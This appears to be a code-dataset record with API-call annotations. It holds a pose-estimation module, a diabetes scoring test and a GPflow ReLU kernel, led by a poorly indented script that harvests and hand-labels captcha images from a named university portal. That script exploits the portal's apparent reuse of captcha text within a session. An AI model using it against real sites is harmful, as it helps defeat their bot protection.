mainUrl = "https://portal.aut.ac.ir/aportal/index.jsp"
img_url = 'https://portal.aut.ac.ir/aportal/PassImageServlet'
pics_src = '/home/mahdi/Desktop/pics/'
if not os.path.isdir(pics_src):
os.makedirs(pics_src)
num = len(os.listdir(pics_src))
flag = True
while flag:
print(str(num) + ' file saved')
request1 = requests.get(mainUrl, allow_redirects=True)
cookies = request1.cookies
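        # The captcha image is tied to the session cookie handed out by
        # index.jsp, so the same cookie jar must be sent to PassImageServlet.
        # The script also assumes the servlet keeps re-rendering the *same*
        # captcha text within one session; that is what lets the 99 extra
        # fetches below reuse the label typed in by hand.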
request = requests.get(img_url, allow_redirects=True, stream=True, cookies=cookies)
print(request.status_code)
with open('/home/mahdi/Desktop/bw_image', 'wb') as out_file:
shutil.copyfileobj(request.raw, out_file)
img = cv2.imread('/home/mahdi/Desktop/bw_image')
        print('Type the captcha text (Enter to confirm, "x" to quit):')
name = ''
cv2.namedWindow("captcha")
while True:
cv2.imshow("captcha", img)
# print(cv2.waitKey())
            k = cv2.waitKey()
# print(k)
if k == 10:
break
elif k == 65288:
name = name[0:len(name)-1]
else:
name += chr(k)
print(name)
# cv2.destroyAllWindows()
# cv2.imshow('img', img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# name = input()
if name == 'x':
flag = False
break
cv2.imwrite(pics_src + name + '.jpeg', img)
for i in range(1, 100):
request = requests.get(img_url, allow_redirects=True, stream=True, cookies=cookies)
with open('/home/mahdi/Desktop/bw_image', 'wb') as out_file:
shutil.copyfileobj(request.raw, out_file)
img = cv2.imread('/home/mahdi/Desktop/bw_image')
            cv2.imwrite(pics_src + name + str(i) + '.jpeg', img)
num += 100
if __name__== "__main__":
main()
|
[
"os.makedirs",
"os.path.isdir",
"cv2.imwrite",
"cv2.waitKey",
"cv2.imshow",
"cv2.imread",
"requests.get",
"shutil.copyfileobj",
"os.listdir",
"cv2.namedWindow"
] |
[((245, 268), 'os.path.isdir', 'os.path.isdir', (['pics_src'], {}), '(pics_src)\n', (258, 268), False, 'import os\n'), ((278, 299), 'os.makedirs', 'os.makedirs', (['pics_src'], {}), '(pics_src)\n', (289, 299), False, 'import os\n'), ((314, 334), 'os.listdir', 'os.listdir', (['pics_src'], {}), '(pics_src)\n', (324, 334), False, 'import os\n'), ((428, 471), 'requests.get', 'requests.get', (['mainUrl'], {'allow_redirects': '(True)'}), '(mainUrl, allow_redirects=True)\n', (440, 471), False, 'import requests\n'), ((525, 598), 'requests.get', 'requests.get', (['img_url'], {'allow_redirects': '(True)', 'stream': '(True)', 'cookies': 'cookies'}), '(img_url, allow_redirects=True, stream=True, cookies=cookies)\n', (537, 598), False, 'import requests\n'), ((771, 813), 'cv2.imread', 'cv2.imread', (['"""/home/mahdi/Desktop/bw_image"""'], {}), "('/home/mahdi/Desktop/bw_image')\n", (781, 813), False, 'import cv2\n'), ((877, 903), 'cv2.namedWindow', 'cv2.namedWindow', (['"""captcha"""'], {}), "('captcha')\n", (892, 903), False, 'import cv2\n'), ((1474, 1517), 'cv2.imwrite', 'cv2.imwrite', (["(pics_src + name + '.jpeg')", 'img'], {}), "(pics_src + name + '.jpeg', img)\n", (1485, 1517), False, 'import cv2\n'), ((715, 756), 'shutil.copyfileobj', 'shutil.copyfileobj', (['request.raw', 'out_file'], {}), '(request.raw, out_file)\n', (733, 756), False, 'import shutil\n'), ((936, 962), 'cv2.imshow', 'cv2.imshow', (['"""captcha"""', 'img'], {}), "('captcha', img)\n", (946, 962), False, 'import cv2\n'), ((1015, 1028), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (1026, 1028), False, 'import cv2\n'), ((1572, 1645), 'requests.get', 'requests.get', (['img_url'], {'allow_redirects': '(True)', 'stream': '(True)', 'cookies': 'cookies'}), '(img_url, allow_redirects=True, stream=True, cookies=cookies)\n', (1584, 1645), False, 'import requests\n'), ((1795, 1837), 'cv2.imread', 'cv2.imread', (['"""/home/mahdi/Desktop/bw_image"""'], {}), "('/home/mahdi/Desktop/bw_image')\n", (1805, 1837), False, 'import cv2\n'), ((1735, 1776), 'shutil.copyfileobj', 'shutil.copyfileobj', (['request.raw', 'out_file'], {}), '(request.raw, out_file)\n', (1753, 1776), False, 'import shutil\n')]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import os.path as osp
import argparse
import time
import numpy as np
from tqdm import tqdm
import json
import torch
import torch.backends.cudnn as cudnn
import cv2
import _init_paths
from _init_paths import get_path
from utils.utilitys import plot_keypoint, PreProcess, write, load_json
from config import cfg, update_config
from utils.transforms import *
from utils.inference import get_final_preds
import models
sys.path.pop(0)
pre_dir, cur_dir, chk_root, data_root, lib_root, output_root = get_path(__file__)
cfg_dir = pre_dir + '/experiments/coco/hrnet/'
model_dir = chk_root + 'hrnet/pose_coco/'
# Loading human detector model
sys.path.insert(0, lib_root)
from detector import load_model as yolo_model
from detector import yolo_human_det as yolo_det
from track.sort import Sort
sys.path.pop(0)
def parse_args():
parser = argparse.ArgumentParser(description='Train keypoints network')
# general
parser.add_argument('--cfg', type=str, default=cfg_dir + 'w48_384x288_adam_lr1e-3.yaml',
help='experiment configure file name')
parser.add_argument('opts', nargs=argparse.REMAINDER, default=None,
help="Modify config options using the command-line")
parser.add_argument('--modelDir', type=str, default=model_dir + 'pose_hrnet_w48_384x288.pth',
help='The model directory')
parser.add_argument('--det-dim', type=int, default=416,
help='The input dimension of the detected image')
parser.add_argument('--thred-score', type=float, default=0.70,
help='The threshold of object Confidence')
parser.add_argument('-a', '--animation', action='store_true',
help='output animation')
parser.add_argument('-np', '--num-person', type=int, default=1,
help='The maximum number of estimated poses')
parser.add_argument("-v", "--video", type=str, default='camera',
help="input video file name")
args = parser.parse_args()
return args
def reset_config(args):
update_config(cfg, args)
# cudnn related setting
cudnn.benchmark = cfg.CUDNN.BENCHMARK
torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED
# load model
def model_load(config):
print('Loading HRNet model ...')
# lib/models/pose_hrnet.py:get_pose_net
model = eval('models.' + config.MODEL.NAME + '.get_pose_net')(config, is_train=False)
if torch.cuda.is_available():
model = model.cuda()
state_dict = torch.load(config.OUTPUT_DIR)
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
        name = k  # would strip a 'module.' prefix here; this checkpoint has none
# print(name,'\t')
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
model.eval()
print('HRNet network successfully loaded')
return model
def load_default_model():
args = parse_args()
reset_config(args)
print('Loading HRNet model ...')
# lib/models/pose_hrnet.py:get_pose_net
model = eval('models.' + cfg.MODEL.NAME + '.get_pose_net')(cfg, is_train=False)
if torch.cuda.is_available():
model = model.cuda()
state_dict = torch.load(cfg.OUTPUT_DIR)
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
        name = k  # would strip a 'module.' prefix here; this checkpoint has none
# print(name,'\t')
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
model.eval()
print('HRNet network successfully loaded')
return model
def gen_img_kpts(image, human_model, pose_model, human_sort, det_dim=416, num_peroson=2):
"""
:param image: Input image matrix instead of image path
:param human_model: The YOLOv3 model
:param pose_model: The HRNet model
:param human_sort: Input initialized sort tracker
:param det_dim: The input dimension of YOLOv3. [160, 320, 416]
:param num_peroson: The number of tracked people
:return:
kpts: (M, N, 2)
scores: (M, N, 1)
bboxs_track: (x1, y1, x2, y2, ID)
human_sort: Updated human_sort
"""
args = parse_args()
reset_config(args)
thred_score = args.thred_score
bboxs, bbox_scores = yolo_det(image, human_model, reso=det_dim, confidence=thred_score)
if bboxs is None or not bboxs.any():
return None, None, None
# Using Sort to track people
# people_track: Num_bbox × [x1, y1, x2, y2, ID]
people_track = human_sort.update(bboxs)
    # Keep the last num_peroson tracks (the ID column is retained here so it can be returned)
if people_track.shape[0] == 1:
bboxs_track = people_track[-1].reshape(1, 5)
else:
people_track_ = people_track[-num_peroson:].reshape(num_peroson, 5)
bboxs_track = people_track_[::-1]
with torch.no_grad():
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(image, bboxs_track, cfg, num_peroson)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
output = pose_model(inputs)
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center), np.asarray(scale))
kpts = np.zeros((num_peroson, 17, 2), dtype=np.float32)
scores = np.zeros((num_peroson, 17, 1), dtype=np.float32)
for i, kpt in enumerate(preds):
kpts[i] = kpt
for i, score in enumerate(maxvals):
scores[i] = score
human_indexes = []
for i in range(len(bboxs_track)):
human_indexes.append(bboxs_track[i, -1])
return kpts, scores, human_indexes
def gen_video_kpts(video, det_dim=416, num_peroson=1, gen_output=False):
# Updating configuration
args = parse_args()
reset_config(args)
cap = cv2.VideoCapture(video)
assert cap.isOpened(), 'Cannot capture source'
# Loading detector and pose model, initialize sort for track
human_model = yolo_model(inp_dim=det_dim)
pose_model = model_load(cfg)
people_sort = Sort()
video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
# video_length = 1000
# collect keypoints coordinate
print('Generating 2D pose ...')
kpts_result = []
scores_result = []
for i in tqdm(range(video_length)):
ret, frame = cap.read()
if not ret:
continue
# start = time.time()
try:
bboxs, scores = yolo_det(frame, human_model, reso=det_dim, confidence=args.thred_score)
if bboxs is None or not bboxs.any():
print('No person detected!')
# print('FPS of the video is {:5.2f}'.format(1 / (time.time() - start)))
continue
# Using Sort to track people
people_track = people_sort.update(bboxs)
# Track the first two people in the video and remove the ID
if people_track.shape[0] == 1:
people_track_ = people_track[-1, :-1].reshape(1, 4)
elif people_track.shape[0] >= 2:
people_track_ = people_track[-num_peroson:, :-1].reshape(num_peroson, 4)
people_track_ = people_track_[::-1]
else:
continue
track_bboxs = []
for bbox in people_track_:
bbox = [round(i, 2) for i in list(bbox)]
track_bboxs.append(bbox)
        except Exception as e:
            print(e)
            exit(0)
with torch.no_grad():
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(frame, track_bboxs, cfg, num_peroson)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
output = pose_model(inputs)
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center), np.asarray(scale))
if gen_output:
kpts = np.zeros((num_peroson, 17, 2), dtype=np.float32)
scores = np.zeros((num_peroson, 17), dtype=np.float32)
for i, kpt in enumerate(preds):
kpts[i] = kpt
for i, score in enumerate(maxvals):
scores[i] = score.squeeze()
kpts_result.append(kpts)
scores_result.append(scores)
else:
index_bboxs = [bbox + [i] for i, bbox in enumerate(track_bboxs)]
list(map(lambda x: write(x, frame), index_bboxs))
plot_keypoint(frame, preds, maxvals, 0.3)
# print('FPS of the video is {:5.2f}'.format(1 / (time.time() - start)))
cv2.imshow('frame', frame)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
if gen_output:
keypoints = np.array(kpts_result)
scores = np.array(scores_result)
keypoints = keypoints.transpose(1, 0, 2, 3) # (T, M, N, 2) --> (M, T, N, 2)
scores = scores.transpose(1, 0, 2) # (T, M, N) --> (M, T, N)
return keypoints, scores
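# A hedged usage sketch for the function above ('clip.mp4' is hypothetical):
#     keypoints, scores = gen_video_kpts('clip.mp4', num_peroson=2, gen_output=True)
# returns arrays of shape (M, T, 17, 2) and (M, T, 17) for M tracked people
# over T processed frames, per the transposes directly above.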
def generate_ntu_kpts_json(video_path, kpts_file):
args = parse_args()
reset_config(args)
# Loading detector and pose model, initialize sort for track
human_model = yolo_model()
pose_model = model_load(cfg)
people_sort = Sort()
with torch.no_grad():
cap = cv2.VideoCapture(video_path)
video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
# collect keypoints information
kpts_info = dict()
data = []
for i in tqdm(range(video_length)):
frame_info = {'frame_index': i + 1}
ret, frame = cap.read()
try:
bboxs, scores = yolo_det(frame, human_model, confidence=args.thred_score)
if bboxs is None or not bboxs.any():
print('No person detected!')
continue
# Using Sort to track people
people_track = people_sort.update(bboxs)
# Track the first two people in the video and remove the ID
if people_track.shape[0] == 1:
people_track_ = people_track[-1, :-1].reshape(1, 4)
elif people_track.shape[0] >= 2:
people_track_ = people_track[-2:, :-1].reshape(2, 4)
people_track_ = people_track_[::-1]
else:
skeleton = {'skeleton': [{'pose': [], 'score': [], 'bbox': []}]}
frame_info.update(skeleton)
data.append(frame_info)
continue
track_bboxs = []
for bbox in people_track_:
bbox = [round(i, 3) for i in list(bbox)]
track_bboxs.append(bbox)
except Exception as e:
print(e)
continue
# bbox is coordinate location
inputs, origin_img, center, scale = PreProcess(frame, bboxs, cfg, args.num_person)
inputs = inputs[:, [2, 1, 0]]
if torch.cuda.is_available():
inputs = inputs.cuda()
            output = pose_model(inputs)
# compute coordinate
preds, maxvals = get_final_preds(cfg, output.clone().cpu().numpy(), np.asarray(center),
np.asarray(scale))
skeleton = []
for num, bbox in enumerate(track_bboxs):
pose = preds[num].tolist()
score = maxvals[num].tolist()
pose = round_list(pose)
score = round_list(score)
one_skeleton = {'pose': pose,
'score': score,
'bbox': bbox}
skeleton.append(one_skeleton)
frame_info.update({'skeleton': skeleton})
data.append(frame_info)
kpts_info.update({'data': data})
with open(kpts_file, 'w') as fw:
json.dump(kpts_info, fw)
print('Finishing!')
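# The JSON written above has this shape (field names taken from the code):
#     {"data": [{"frame_index": 1,
#                "skeleton": [{"pose": [[x, y], ...17 joints],
#                              "score": [[s], ...],
#                              "bbox": [x1, y1, x2, y2]}]},
#               ...]}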
def round_list(input_list, decimals=3):
dim = len(input_list)
for i in range(dim):
for j in range(len(input_list[i])):
input_list[i][j] = round(input_list[i][j], decimals)
return input_list
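# Minimal usage sketch for round_list (illustrative, not part of the original
# file): the nested list is rounded in place and also returned.
if __name__ == '__main__':
    demo = [[1.23456, 2.34567], [3.45678]]
    assert round_list(demo) == [[1.235, 2.346], [3.457]]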
|
[
"sys.path.pop",
"argparse.ArgumentParser",
"utils.utilitys.plot_keypoint",
"config.update_config",
"cv2.imshow",
"detector.load_model",
"torch.no_grad",
"detector.yolo_human_det",
"torch.load",
"json.dump",
"cv2.waitKey",
"numpy.asarray",
"torch.cuda.is_available",
"track.sort.Sort",
"utils.utilitys.write",
"_init_paths.get_path",
"numpy.zeros",
"sys.path.insert",
"utils.utilitys.PreProcess",
"cv2.VideoCapture",
"numpy.array",
"collections.OrderedDict"
] |
[((546, 561), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (558, 561), False, 'import sys\n'), ((626, 644), '_init_paths.get_path', 'get_path', (['__file__'], {}), '(__file__)\n', (634, 644), False, 'from _init_paths import get_path\n'), ((766, 794), 'sys.path.insert', 'sys.path.insert', (['(0)', 'lib_root'], {}), '(0, lib_root)\n', (781, 794), False, 'import sys\n'), ((917, 932), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (929, 932), False, 'import sys\n'), ((966, 1028), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train keypoints network"""'}), "(description='Train keypoints network')\n", (989, 1028), False, 'import argparse\n'), ((2220, 2244), 'config.update_config', 'update_config', (['cfg', 'args'], {}), '(cfg, args)\n', (2233, 2244), False, 'from config import cfg, update_config\n'), ((2651, 2676), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2674, 2676), False, 'import torch\n'), ((2725, 2754), 'torch.load', 'torch.load', (['config.OUTPUT_DIR'], {}), '(config.OUTPUT_DIR)\n', (2735, 2754), False, 'import torch\n'), ((2816, 2829), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2827, 2829), False, 'from collections import OrderedDict\n'), ((3333, 3358), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3356, 3358), False, 'import torch\n'), ((3407, 3433), 'torch.load', 'torch.load', (['cfg.OUTPUT_DIR'], {}), '(cfg.OUTPUT_DIR)\n', (3417, 3433), False, 'import torch\n'), ((3495, 3508), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3506, 3508), False, 'from collections import OrderedDict\n'), ((4456, 4522), 'detector.yolo_human_det', 'yolo_det', (['image', 'human_model'], {'reso': 'det_dim', 'confidence': 'thred_score'}), '(image, human_model, reso=det_dim, confidence=thred_score)\n', (4464, 4522), True, 'from detector import yolo_human_det as yolo_det\n'), ((6043, 6066), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (6059, 6066), False, 'import cv2\n'), ((6202, 6229), 'detector.load_model', 'yolo_model', ([], {'inp_dim': 'det_dim'}), '(inp_dim=det_dim)\n', (6212, 6229), True, 'from detector import load_model as yolo_model\n'), ((6281, 6287), 'track.sort.Sort', 'Sort', ([], {}), '()\n', (6285, 6287), False, 'from track.sort import Sort\n'), ((9519, 9531), 'detector.load_model', 'yolo_model', ([], {}), '()\n', (9529, 9531), True, 'from detector import load_model as yolo_model\n'), ((9583, 9589), 'track.sort.Sort', 'Sort', ([], {}), '()\n', (9587, 9589), False, 'from track.sort import Sort\n'), ((5018, 5033), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5031, 5033), False, 'import torch\n'), ((5117, 5165), 'utils.utilitys.PreProcess', 'PreProcess', (['image', 'bboxs_track', 'cfg', 'num_peroson'], {}), '(image, bboxs_track, cfg, num_peroson)\n', (5127, 5165), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((5216, 5241), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5239, 5241), False, 'import torch\n'), ((5475, 5523), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 2)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 2), dtype=np.float32)\n', (5483, 5523), True, 'import numpy as np\n'), ((5541, 5589), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 1)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 1), dtype=np.float32)\n', (5549, 5589), True, 'import numpy as np\n'), ((9083, 9104), 'numpy.array', 'np.array', (['kpts_result'], {}), '(kpts_result)\n', (9091, 9104), True, 'import numpy as np\n'), ((9122, 9145), 'numpy.array', 'np.array', (['scores_result'], {}), '(scores_result)\n', (9130, 9145), True, 'import numpy as np\n'), ((9600, 9615), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (9613, 9615), False, 'import torch\n'), ((9631, 9659), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (9647, 9659), False, 'import cv2\n'), ((5420, 5438), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (5430, 5438), True, 'import numpy as np\n'), ((5440, 5457), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (5450, 5457), True, 'import numpy as np\n'), ((6674, 6745), 'detector.yolo_human_det', 'yolo_det', (['frame', 'human_model'], {'reso': 'det_dim', 'confidence': 'args.thred_score'}), '(frame, human_model, reso=det_dim, confidence=args.thred_score)\n', (6682, 6745), True, 'from detector import yolo_human_det as yolo_det\n'), ((7738, 7753), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7751, 7753), False, 'import torch\n'), ((7845, 7893), 'utils.utilitys.PreProcess', 'PreProcess', (['frame', 'track_bboxs', 'cfg', 'num_peroson'], {}), '(frame, track_bboxs, cfg, num_peroson)\n', (7855, 7893), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((7952, 7977), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (7975, 7977), False, 'import torch\n'), ((8254, 8302), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 2)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 2), dtype=np.float32)\n', (8262, 8302), True, 'import numpy as np\n'), ((8324, 8369), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17)'], {'dtype': 'np.float32'}), '((num_peroson, 17), dtype=np.float32)\n', (8332, 8369), True, 'import numpy as np\n'), ((8782, 8823), 'utils.utilitys.plot_keypoint', 'plot_keypoint', (['frame', 'preds', 'maxvals', '(0.3)'], {}), '(frame, preds, maxvals, 0.3)\n', (8795, 8823), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((8922, 8948), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (8932, 8948), False, 'import cv2\n'), ((8967, 8981), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (8978, 8981), False, 'import cv2\n'), ((11242, 11288), 'utils.utilitys.PreProcess', 'PreProcess', (['frame', 'bboxs', 'cfg', 'args.num_person'], {}), '(frame, bboxs, cfg, args.num_person)\n', (11252, 11288), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((11346, 11371), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (11369, 11371), False, 'import torch\n'), ((12280, 12304), 'json.dump', 'json.dump', (['kpts_info', 'fw'], {}), '(kpts_info, fw)\n', (12289, 12304), False, 'import json\n'), ((8172, 8190), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (8182, 8190), True, 'import numpy as np\n'), ((8192, 8209), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (8202, 8209), True, 'import numpy as np\n'), ((9987, 10044), 'detector.yolo_human_det', 'yolo_det', (['frame', 'human_model'], {'confidence': 'args.thred_score'}), '(frame, human_model, confidence=args.thred_score)\n', (9995, 10044), True, 'from detector import yolo_human_det as yolo_det\n'), ((11572, 11590), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (11582, 11590), True, 'import numpy as np\n'), ((11637, 11654), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (11647, 11654), True, 'import numpy as np\n'), ((8739, 8754), 'utils.utilitys.write', 'write', (['x', 'frame'], {}), '(x, frame)\n', (8744, 8754), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n')]
|
import os
import unittest
import pandas as pd
from diabetes.scoring.batch.run import batch_scoring
from diabetes.training.evaluate import split_data
from diabetes.training.train import train_model
class TestScoringBatchMethods(unittest.TestCase):
def test_batch_scoring(self):
ridge_args = {"alpha": 0.5}
data_file = os.path.join("tests/diabetes/data", "diabetes_unit_test.csv")
train_df = pd.read_csv(data_file).drop(columns=["SEX"])
data = split_data(train_df)
model = train_model(data["train"], ridge_args)
score_data_file = os.path.join("tests/diabetes/data", "scoring_dataset.csv")
score_df = pd.read_csv(score_data_file).drop(columns=["SEX"])
scores = batch_scoring(model, score_df)
self.assertAlmostEqual(scores[0], 60.75743442)
self.assertAlmostEqual(scores[1], 67.10061271)
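# Illustrative invocation (not part of the original file): the case runs under
# the standard library runner, e.g.  python -m unittest discover -s tests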
|
[
"diabetes.training.evaluate.split_data",
"diabetes.scoring.batch.run.batch_scoring",
"pandas.read_csv",
"diabetes.training.train.train_model",
"os.path.join"
] |
[((340, 401), 'os.path.join', 'os.path.join', (['"""tests/diabetes/data"""', '"""diabetes_unit_test.csv"""'], {}), "('tests/diabetes/data', 'diabetes_unit_test.csv')\n", (352, 401), False, 'import os\n'), ((481, 501), 'diabetes.training.evaluate.split_data', 'split_data', (['train_df'], {}), '(train_df)\n', (491, 501), False, 'from diabetes.training.evaluate import split_data\n'), ((518, 556), 'diabetes.training.train.train_model', 'train_model', (["data['train']", 'ridge_args'], {}), "(data['train'], ridge_args)\n", (529, 556), False, 'from diabetes.training.train import train_model\n'), ((584, 642), 'os.path.join', 'os.path.join', (['"""tests/diabetes/data"""', '"""scoring_dataset.csv"""'], {}), "('tests/diabetes/data', 'scoring_dataset.csv')\n", (596, 642), False, 'import os\n'), ((730, 760), 'diabetes.scoring.batch.run.batch_scoring', 'batch_scoring', (['model', 'score_df'], {}), '(model, score_df)\n', (743, 760), False, 'from diabetes.scoring.batch.run import batch_scoring\n'), ((421, 443), 'pandas.read_csv', 'pd.read_csv', (['data_file'], {}), '(data_file)\n', (432, 443), True, 'import pandas as pd\n'), ((662, 690), 'pandas.read_csv', 'pd.read_csv', (['score_data_file'], {}), '(score_data_file)\n', (673, 690), True, 'import pandas as pd\n')]
|
import tensorflow as tf
import numpy as np
import gpflow
from gpflow.base import Parameter
from gpflow.utilities import positive
class ReLUKernel(gpflow.kernels.Kernel):
"""
    Kernel such that a zero-mean GP with this covariance function is equal in distribution
    to an infinitely wide BNN prior with mean 0 and "Neal scaling" on the weights. The recursive equations used
are from https://arxiv.org/abs/1711.00165.
"""
def __init__(self, prior_weight_std, prior_bias_std, depth):
"""
Args:
            prior_weight_std: non-negative float or tuple of depth+1 floats;
                the weights of the corresponding BNN have prior standard deviation prior_weight_std / sqrt(num_inputs).
                If a tuple, a separate standard deviation is used for each layer.
            prior_bias_std: non-negative float or tuple of depth+1 floats;
                the biases of the corresponding BNN have prior standard deviation prior_bias_std.
                If a tuple, a separate standard deviation is used for each layer.
depth: int, number of hidden layers in corresponding BNN
"""
super(ReLUKernel, self).__init__()
if isinstance(prior_weight_std, float) or isinstance(prior_weight_std, int):
prior_weight_std = prior_weight_std * np.ones(depth + 1)
if isinstance(prior_bias_std, float) or isinstance(prior_bias_std, int):
prior_bias_std = prior_bias_std * np.ones(depth + 1)
assert len(prior_weight_std) == len(prior_bias_std) == depth + 1
self.weight_variance = Parameter(prior_weight_std ** 2, transform=positive(1e-5))
self.bias_variance = Parameter(prior_bias_std ** 2, transform=positive(1e-5))
self.depth = depth
def K(self, X, X2=None):
"""
Computes covariance matrix between k(X,X2), if X2 is None computes covariance matrix k(X,X)
Args:
X: [N,D] float
X2: None or [N,D] float, if None X2=X
Returns: [N,N] matrix k(X,X2)
"""
D = X.shape[1] # input dimension
jitter = 1e-15 # jitter for arccosine for numerical reasons
if X2 is None: # compute symmetric version
X2 = X
# base case for recursive formula
Ki = self.bias_variance[0] + self.weight_variance[0] * tf.matmul(X, X2, transpose_b=True) / D
KiX = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X), axis=1) / D
KiX2 = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X2), axis=1) / D
# flattened recursion
for i in range(1, self.depth + 1):
sqrt_term = tf.sqrt(KiX[:, None] * KiX2[None, :]) # outer product of norms
theta = tf.acos(jitter + (1 - 2 * jitter) * Ki/sqrt_term) # angle, 'squash' for numerical stability
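            # order-1 arc-cosine J-term (Cho & Saul): J1(t) = sin(t) + (pi - t) * cos(t);
            # multiplied by sqrt_term below it gives the ReLU second moment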
J_term = tf.sin(theta) + (np.pi - theta) * tf.cos(theta)
# update kernel matrices
Ki = self.bias_variance[i] + self.weight_variance[i] / (2 * np.pi) * sqrt_term * J_term
if i != self.depth: # these are only needed for the recursion, don't update on last call
KiX = self.bias_variance[i] + KiX * self.weight_variance[i] / 2.
KiX2 = self.bias_variance[i] + KiX2 * self.weight_variance[i] / 2.
return Ki
def K_diag(self, X):
"""
Computes diagonal entries of k(X,X)
Args:
X: [N,D] float
Returns: [N] float. diag(k(X,X))
"""
D = X.shape[1] # input dimension
KiX = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X), axis=1) / D
for i in range(1, self.depth + 1):
KiX = self.bias_variance[i] + KiX * self.weight_variance[i] / 2.
return KiX
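# Minimal usage sketch (not part of the original module; the model choice, data
# shapes and hyperparameters are illustrative assumptions): the kernel plugs
# into a standard gpflow regression model like any other gpflow kernel.
if __name__ == '__main__':
    X = np.random.randn(20, 3)
    Y = np.random.randn(20, 1)
    kernel = ReLUKernel(prior_weight_std=1.0, prior_bias_std=0.1, depth=2)
    model = gpflow.models.GPR(data=(X, Y), kernel=kernel)
    print(model.log_marginal_likelihood())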
|
[
"tensorflow.sin",
"gpflow.utilities.positive",
"numpy.ones",
"tensorflow.acos",
"tensorflow.matmul",
"tensorflow.square",
"tensorflow.sqrt",
"tensorflow.cos"
] |
[((2614, 2651), 'tensorflow.sqrt', 'tf.sqrt', (['(KiX[:, None] * KiX2[None, :])'], {}), '(KiX[:, None] * KiX2[None, :])\n', (2621, 2651), True, 'import tensorflow as tf\n'), ((2698, 2749), 'tensorflow.acos', 'tf.acos', (['(jitter + (1 - 2 * jitter) * Ki / sqrt_term)'], {}), '(jitter + (1 - 2 * jitter) * Ki / sqrt_term)\n', (2705, 2749), True, 'import tensorflow as tf\n'), ((1252, 1270), 'numpy.ones', 'np.ones', (['(depth + 1)'], {}), '(depth + 1)\n', (1259, 1270), True, 'import numpy as np\n'), ((1398, 1416), 'numpy.ones', 'np.ones', (['(depth + 1)'], {}), '(depth + 1)\n', (1405, 1416), True, 'import numpy as np\n'), ((1564, 1579), 'gpflow.utilities.positive', 'positive', (['(1e-05)'], {}), '(1e-05)\n', (1572, 1579), False, 'from gpflow.utilities import positive\n'), ((1650, 1665), 'gpflow.utilities.positive', 'positive', (['(1e-05)'], {}), '(1e-05)\n', (1658, 1665), False, 'from gpflow.utilities import positive\n'), ((2812, 2825), 'tensorflow.sin', 'tf.sin', (['theta'], {}), '(theta)\n', (2818, 2825), True, 'import tensorflow as tf\n'), ((2267, 2301), 'tensorflow.matmul', 'tf.matmul', (['X', 'X2'], {'transpose_b': '(True)'}), '(X, X2, transpose_b=True)\n', (2276, 2301), True, 'import tensorflow as tf\n'), ((2846, 2859), 'tensorflow.cos', 'tf.cos', (['theta'], {}), '(theta)\n', (2852, 2859), True, 'import tensorflow as tf\n'), ((2384, 2396), 'tensorflow.square', 'tf.square', (['X'], {}), '(X)\n', (2393, 2396), True, 'import tensorflow as tf\n'), ((2489, 2502), 'tensorflow.square', 'tf.square', (['X2'], {}), '(X2)\n', (2498, 2502), 